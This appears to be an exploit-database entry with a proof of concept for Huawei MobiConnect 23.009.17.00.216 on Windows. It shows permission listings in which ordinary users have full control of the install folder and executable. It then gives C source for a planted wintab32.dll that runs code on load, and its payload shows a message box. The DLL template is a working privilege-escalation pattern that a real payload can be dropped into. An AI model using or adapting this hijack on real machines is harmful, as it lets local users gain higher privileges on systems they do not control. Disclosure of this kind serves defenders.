MobiConnect 23.009.17.00.216 Privilege Escalation / DLL Hijacking



EKU-ID: 4477 CVE: OSVDB-ID:
Author: hadji samir Published: 2015-01-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/* 
* Exploit Title: MobiConnect 23.009.17.00.216  HUAWEI  Insecure Permissions Local Privilege Escalation & DLL Hijacking Exploit (wintab32.dll)
* Date: 25/12/2014
* Author: Hadji Samir s-dz@hotmail.fr
* Vendor Homepage:  http://www.mobilis.dz/entreprises/mobiconnect.php
* Vendor: http://www.huawei.com/
* Tested on: windows 7 FR

##################### Insecure Permissions Local Privilege Escalation ####################
C:\Program Files>cacls "MobiConnect"
C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F
                             BUILTIN\Utilisateurs:(CI)F
                             NT SERVICE\TrustedInstaller:(ID)F
                             NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                             AUTORITE NT\Syst�me:(ID)F
                             AUTORITE NT\Syst�me:(OI)(CI)(IO)(ID)F
                             BUILTIN\Administrateurs:(ID)F
                             BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F
                             CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
C:\Program Files\MobiConnect>cacls "MobiConnect.exe"
C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F
                                             AUTORITE NT\Syst�me:(ID)F
                                             BUILTIN\Administrateurs:(ID)F

########################DLL Hijacking Exploit (wintab32.dll)#########################

*/

#include <windows.h> 

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		owned();
	case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
}

int owned() {
	MessageBox(0, "MobiConnect DLL Hijacked\Hadji Samir", "POC", MB_OK);
}